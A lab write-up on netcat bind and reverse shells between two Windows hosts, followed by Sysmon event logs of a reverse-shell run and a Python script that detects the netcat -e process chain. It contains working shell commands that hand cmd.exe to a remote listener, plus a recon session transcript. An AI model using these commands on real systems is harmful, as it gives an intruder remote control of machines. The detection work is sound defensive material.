A small hands-on with nc remote control and reverse shells
Forward (bind) shell:
On machine A (.132), the side that will be controlled (the C2 client/agent), start a listener that hands the connection to cmd.exe:
nc.exe -L -d -e cmd.exe -p 5555
(-L keeps listening after the client disconnects, -d detaches nc from the console, -e runs cmd.exe on the accepted socket, -p 5555 is the listening port.)
On machine B (.134), connect to it:
nc64.exe XXX.132 5555
You can then type commands and control machine .132 remotely. Note that -e only exists in nc builds compiled with GAPING_SECURITY_HOLE; the Windows 1.11/1.12 builds used here have it, many Linux packages do not.
My nc binaries are on the Desktop, so I run these from a cmd prompt opened there.
Reverse shell example:
On host A (.134), listen on port 8888 and wait for the victim to connect back:
C:\Users\qiankun\Desktop>nc -n -lvvp 8888
listening on [any] 8888 ...
connect to [XXX] from (UNKNOWN) [XXX] 53960
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\qiankun\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is C6C4-46F7

 Directory of C:\Users\qiankun\Desktop

08/01/2022  01:23 AM    <DIR>          .
08/01/2022  01:23 AM    <DIR>          ..
05/11/2022  01:09 AM    <DIR>          619f00628d0db414e782dbf0f3739eb6ceffd0036c6c83a17c31e3c2f6bdc266
05/11/2022  08:35 PM    <DIR>          80ffaea12a5ffb502d6ce110e251024e7ac517025bf95daa49e6ea6ddd0c7d5b
05/16/2022  12:38 AM    <DIR>          aaabitsadmin.exe.ps1
05/16/2022  12:30 AM               616 aaabitsadmin.exe.ps1.zip
05/24/2022  12:13 AM                 0 Add-ConstrainedDelegationBackdoor.ps1
05/30/2022  10:32 PM       104,857,751 Agent.log
05/23/2022  02:38 AM                 3 agent.ps1
06/13/2022  02:14 AM         8,447,018 Agent_1.log
06/09/2022  11:48 PM    <DIR>          b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl
06/09/2022  11:37 PM         1,324,365 b05d367d0ae1022d53926c052c9bfd8cb62745cc.rl.zip
04/26/2022  07:55 PM               208 bitsadmin.exe.ps1
08/04/2017  02:19 AM            75,418 COM Object hijacking persistence.ps1
04/21/2022  02:30 AM    <DIR>          dev
04/14/2022  11:22 PM               167 exit.bat
03/24/2022  08:41 AM             2,348 Microsoft Edge.lnk
04/19/2022  12:30 AM            24,896 msxsl.exe
07/31/2022  09:00 PM            38,616 nc.exe
07/31/2022  09:00 PM            45,272 nc64.exe
08/01/2022  01:14 AM         5,980,919 nc_miansha.exe
04/13/2022  11:23 PM         1,436,160 NeverLose.bin.exe
05/23/2022  02:37 AM                 0 New Text Document.txt
05/23/2022  02:49 AM    <DIR>          nishang-master
05/23/2022  02:39 AM            80,249 nishang-master.zip
06/10/2022  12:42 AM    <DIR>          Office Tool
06/09/2022  11:54 PM     2,085,551,571 Office Tool.zip
05/18/2022  02:43 AM    <DIR>          phpStudy_64
05/17/2022  07:55 PM        81,485,042 phpStudy_64.zip
07/31/2022  10:04 PM    <DIR>          PSTools
07/31/2022  09:10 PM         4,089,627 PSTools.zip
05/23/2022  11:39 PM    <DIR>          QianKunEDR-Windows-x64-Setup
07/31/2022  07:11 PM    <DIR>          QianKunEDR-Windows-x64-Setup (5)
07/31/2022  06:51 PM        90,915,906 QianKunEDR-Windows-x64-Setup (5).zip
05/23/2022  11:28 PM       108,074,453 QianKunEDR-Windows-x64-Setup.zip
04/14/2022  11:22 PM                65 start.bat
05/06/2022  02:25 AM    <DIR>          Sysmon
05/06/2022  02:14 AM         3,263,064 Sysmon.zip
05/16/2022  02:44 AM    <DIR>          test
05/24/2022  02:10 AM            10,522 test.chm
07/31/2022  06:46 PM         3,607,096 winrarx64.610scp.exe
05/07/2022  12:53 AM    <DIR>          x64
04/14/2022  02:30 AM             1,892 XXX.sct
              27 File(s)  2,499,313,244 bytes
              16 Dir(s)  17,187,168,256 bytes free

C:\Users\qiankun\Desktop>whoami
whoami
desktop-gem2odd\qiankun

C:\Users\qiankun\Desktop>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : XXX
   IPv4 Address. . . . . . . . . . . : XXXX
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : XXX
On machine B (.132), the victim, connect back to A and hand the socket to cmd.exe (-t answers telnet negotiation, -e runs the program on the connection):
nc XXX.134IP 8888 -t -e cmd.exe
Machine B can then be controlled from machine A (.134). Because B dials out, this works even when B's inbound ports are firewalled, which is why the reverse direction is the usual one.
Data collection and detection:
The Sysmon events below were recorded on the victim during a separate run of the reverse shell (victim 192.168.203.128 connecting to 192.168.203.130:7777). They are listed newest first, as Event Viewer shows them, so read from the bottom up: nc64.exe starts, opens the anonymous pipes, makes the outbound connection, spawns cmd.exe, and cmd.exe then runs ipconfig and whoami.
Date and Time | Source | Event ID | Task Category

2022/11/15 17:42 | Microsoft-Windows-Sysmon | 18 | Pipe Connected (rule: PipeEvent)
  Pipe Connected:
  RuleName: -
  EventType: ConnectPipe
  UtcTime: 2022-11-15 09:42:51.576
  ProcessGuid: {95699A2E-0F5B-6373-0119-040000000C00}
  ProcessId: 1908
  PipeName: \lsass
  Image: C:\Windows\system32\mmc.exe
  User: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 1 | Process Create (rule: ProcessCreate)
  Process Create:
  RuleName: -
  UtcTime: 2022-11-15 09:40:31.750
  ProcessGuid: {95699A2E-5E8F-6373-7519-040000000C00}
  ProcessId: 3440
  Image: C:\Windows\System32\whoami.exe
  FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
  Description: whoami - displays logged on user information
  Product: Microsoft® Windows® Operating System
  Company: Microsoft Corporation
  OriginalFileName: whoami.exe
  CommandLine: whoami
  CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
  User: dw-PC\dw
  LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
  LogonId: 0xcc239
  TerminalSessionId: 1
  IntegrityLevel: Medium
  Hashes: MD5=EC2231C0FEA6B821A5ED097419744205,SHA256=C36CF78F2257F606AB67B14AFB02DCA652A3FA6907C7805EFBD2D47241EE609A,IMPHASH=33138CA52B3F4A94BA90037F3DE01CB2
  ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
  ParentProcessId: 5016
  ParentImage: C:\Windows\System32\cmd.exe
  ParentCommandLine: cmd.exe
  ParentUser: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 1 | Process Create (rule: ProcessCreate)
  Process Create:
  RuleName: -
  UtcTime: 2022-11-15 09:40:20.362
  ProcessGuid: {95699A2E-5E84-6373-7419-040000000C00}
  ProcessId: 4808
  Image: C:\Windows\System32\ipconfig.exe
  FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255)
  Description: IP Configuration Utility
  Product: Microsoft® Windows® Operating System
  Company: Microsoft Corporation
  OriginalFileName: ipconfig.exe
  CommandLine: ipconfig
  CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
  User: dw-PC\dw
  LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
  LogonId: 0xcc239
  TerminalSessionId: 1
  IntegrityLevel: Medium
  Hashes: MD5=CF45949CDBB39C953331CDCB9CEC20F8,SHA256=34DF739526C114BB89470B3B650946CBF7335CB4A2206489534FB05C1FC143A8,IMPHASH=BBBA00511B8BEF70143B0EEBBB337273
  ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
  ParentProcessId: 5016
  ParentImage: C:\Windows\System32\cmd.exe
  ParentCommandLine: cmd.exe
  ParentUser: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 3 | Network connection detected (rule: NetworkConnect)
  Network connection detected:
  RuleName: Usermode
  UtcTime: 2022-10-14 17:11:18.718
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  User: dw-PC\dw
  Protocol: tcp
  Initiated: true
  SourceIsIpv6: false
  SourceIp: 192.168.203.128
  SourceHostname: dw-PC.localdomain
  SourcePort: 49405
  SourcePortName: -
  DestinationIsIpv6: false
  DestinationIp: 192.168.203.130
  DestinationHostname: -
  DestinationPort: 7777
  DestinationPortName: -

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 1 | Process Create (rule: ProcessCreate)
  Process Create:
  RuleName: -
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}
  ProcessId: 5016
  Image: C:\Windows\System32\cmd.exe
  FileVersion: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
  Description: Windows Command Processor
  Product: Microsoft® Windows® Operating System
  Company: Microsoft Corporation
  OriginalFileName: Cmd.Exe
  CommandLine: cmd.exe
  CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
  User: dw-PC\dw
  LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
  LogonId: 0xcc239
  TerminalSessionId: 1
  IntegrityLevel: Medium
  Hashes: MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A
  ParentProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ParentProcessId: 3876
  ParentImage: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  ParentCommandLine: nc64.exe -e cmd.exe 192.168.203.130 7777
  ParentUser: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 18 | Pipe Connected (rule: PipeEvent)
  Pipe Connected:
  RuleName: -
  EventType: ConnectPipe
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  PipeName: <Anonymous Pipe>
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  User: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 17 | Pipe Created (rule: PipeEvent)
  Pipe Created:
  RuleName: -
  EventType: CreatePipe
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  PipeName: <Anonymous Pipe>
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  User: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 18 | Pipe Connected (rule: PipeEvent)
  Pipe Connected:
  RuleName: -
  EventType: ConnectPipe
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  PipeName: <Anonymous Pipe>
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  User: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 17 | Pipe Created (rule: PipeEvent)
  Pipe Created:
  RuleName: -
  EventType: CreatePipe
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  PipeName: <Anonymous Pipe>
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  User: dw-PC\dw

2022/11/15 17:40 | Microsoft-Windows-Sysmon | 1 | Process Create (rule: ProcessCreate)
  Process Create:
  RuleName: -
  UtcTime: 2022-11-15 09:40:12.203
  ProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}
  ProcessId: 3876
  Image: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\nc64.exe
  FileVersion: -
  Description: -
  Product: -
  Company: -
  OriginalFileName: -
  CommandLine: nc64.exe -e cmd.exe 192.168.203.130 7777
  CurrentDirectory: C:\Users\dw\Desktop\reverse-shell-win-Tools\netcat-for-windows-master\netcat-for-windows-master\1.12\
  User: dw-PC\dw
  LogonGuid: {95699A2E-02F7-632C-39C2-0C0000000000}
  LogonId: 0xcc239
  TerminalSessionId: 1
  IntegrityLevel: Medium
  Hashes: MD5=523613A7B9DFA398CBD5EBD2DD0F4F38,SHA256=3E59379F585EBF0BECB6B4E06D0FBBF806DE28A4BB256E837B4555F1B4245571,IMPHASH=567531F08180AB3963B70889578118A3
  ParentProcessGuid: {95699A2E-5924-6373-6B19-040000000C00}
  ParentProcessId: 2680
  ParentImage: C:\Windows\System32\cmd.exe
  ParentCommandLine: "C:\Windows\System32\cmd.exe"
  ParentUser: dw-PC\dw

The telltales are all in the Event 1 and Event 3 records: a netcat image started with -e, a network connection initiated by that same image, cmd.exe whose parent is nc64.exe, and recon binaries (ipconfig, whoami) whose parent is that cmd.exe. The anonymous pipe events (17/18) are nc wiring the child's stdin/stdout to the socket; the mmc.exe \lsass pipe event at 17:42 is Event Viewer itself and is noise. The two Sysmon hashes of nc64.exe (MD5 523613A7..., SHA256 3E59379F...) are only useful until the attacker recompiles or repacks the binary (the nc_miansha.exe on the other desktop is exactly that), so the parent/child relationships are the more durable signal.
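The detection logic sketched above, as an added example that is not part of the original post: it parses Sysmon "Key: Value" message bodies, then flags a netcat image run with -e, a connection initiated by a netcat image, and any process that has netcat somewhere in its ancestry. The ancestry walk keys on ProcessGuid rather than PID, because Sysmon GUIDs survive PID reuse. The sample records are reduced from the lab log above (hashes, versions, logon fields and the pipe events dropped, put back into chronological order); the final notepad.exe record and its GUIDs are constructed so the rules also see benign input. It assumes nothing beyond the Python standard library.

```python
"""Flag the nc -e cmd.exe chain in Sysmon Event 1/3 records by walking process ancestry."""
import ntpath
import re
from typing import Dict, List, Tuple

NETCAT_IMAGES = {"nc.exe", "nc64.exe", "ncat.exe", "netcat.exe"}

# Message bodies reduced from the lab log (fields the rules read only), oldest first.
# The last notepad.exe record is constructed so the rules also see benign input.
NC_DIR = ("C:\\Users\\dw\\Desktop\\reverse-shell-win-Tools\\netcat-for-windows-master"
          "\\netcat-for-windows-master\\1.12\\")
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (1, "Process Create:\nProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}\n"
        "ProcessId: 3876\nImage: " + NC_DIR + "nc64.exe\n"
        "CommandLine: nc64.exe -e cmd.exe 192.168.203.130 7777\n"
        "ParentProcessGuid: {95699A2E-5924-6373-6B19-040000000C00}\n"
        "ParentImage: C:\\Windows\\System32\\cmd.exe"),
    (3, "Network connection detected:\nProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}\n"
        "Image: " + NC_DIR + "nc64.exe\nInitiated: true\n"
        "SourceIp: 192.168.203.128\nSourcePort: 49405\n"
        "DestinationIp: 192.168.203.130\nDestinationPort: 7777"),
    (1, "Process Create:\nProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}\n"
        "ProcessId: 5016\nImage: C:\\Windows\\System32\\cmd.exe\nCommandLine: cmd.exe\n"
        "ParentProcessGuid: {95699A2E-5E7C-6373-7219-040000000C00}\n"
        "ParentImage: " + NC_DIR + "nc64.exe"),
    (1, "Process Create:\nProcessGuid: {95699A2E-5E8F-6373-7519-040000000C00}\n"
        "ProcessId: 3440\nImage: C:\\Windows\\System32\\whoami.exe\nCommandLine: whoami\n"
        "ParentProcessGuid: {95699A2E-5E7C-6373-7319-040000000C00}\n"
        "ParentImage: C:\\Windows\\System32\\cmd.exe"),
    # Constructed benign record (GUIDs invented).
    (1, "Process Create:\nProcessGuid: {00000000-0000-0000-0000-000000000001}\n"
        "ProcessId: 1234\nImage: C:\\Windows\\System32\\notepad.exe\nCommandLine: notepad.exe\n"
        "ParentProcessGuid: {00000000-0000-0000-0000-000000000002}\n"
        "ParentImage: C:\\Windows\\explorer.exe"),
]


def parse_message(text: str) -> Dict[str, str]:
    """Split a Sysmon 'Key: Value' message body (first line is the title) into a dict."""
    fields: Dict[str, str] = {}
    for line in text.splitlines()[1:]:
        key, sep, value = line.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return ntpath.basename(path).lower()


def detect(events: List[Tuple[int, str]]) -> List[str]:
    """Return one finding per suspicious event, in input order."""
    procs: Dict[str, Dict[str, str]] = {}  # ProcessGuid -> parsed Event 1 fields
    findings: List[str] = []
    for event_id, text in events:
        f = parse_message(text)
        if event_id == 1:
            procs[f["ProcessGuid"]] = f
            image = image_name(f["Image"])
            # Rule 1: a netcat image started with -e (program handed the socket).
            if image in NETCAT_IMAGES and re.search(r"(^|\s)-e\s", f["CommandLine"]):
                findings.append(f"netcat exec: pid {f['ProcessId']} {f['CommandLine']}")
            # Rule 2: netcat anywhere in the ancestry, walked by ProcessGuid.
            chain = [image]
            guid = f["ParentProcessGuid"]
            while guid in procs and len(chain) < 32:
                chain.append(image_name(procs[guid]["Image"]))
                guid = procs[guid]["ParentProcessGuid"]
            if image not in NETCAT_IMAGES and any(p in NETCAT_IMAGES for p in chain[1:]):
                findings.append("netcat descendant: " + " <- ".join(chain))
        elif event_id == 3 and image_name(f["Image"]) in NETCAT_IMAGES:
            # Rule 3: Initiated=true is the victim dialling out (reverse shell);
            # Initiated=false would be the accepted connection of a bind shell.
            kind = "outbound (reverse shell)" if f["Initiated"] == "true" else "inbound (bind shell)"
            findings.append(f"netcat {kind}: {f['SourceIp']}:{f['SourcePort']} "
                            f"-> {f['DestinationIp']}:{f['DestinationPort']}")
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample it reports four findings: the nc64.exe -e launch, the outbound 192.168.203.128:49405 -> 192.168.203.130:7777 connection, cmd.exe under nc64.exe, and whoami.exe under cmd.exe under nc64.exe; notepad.exe is ignored. Two caveats: the ancestry walk only sees parents whose own Event 1 fell inside the window you feed it, and Event 3 is only written when the Sysmon config includes a NetworkConnect rule (the lab log shows RuleName: Usermode, so it did). A renamed or repacked netcat defeats the image-name match, which is why the parent/child rule is the one worth keeping.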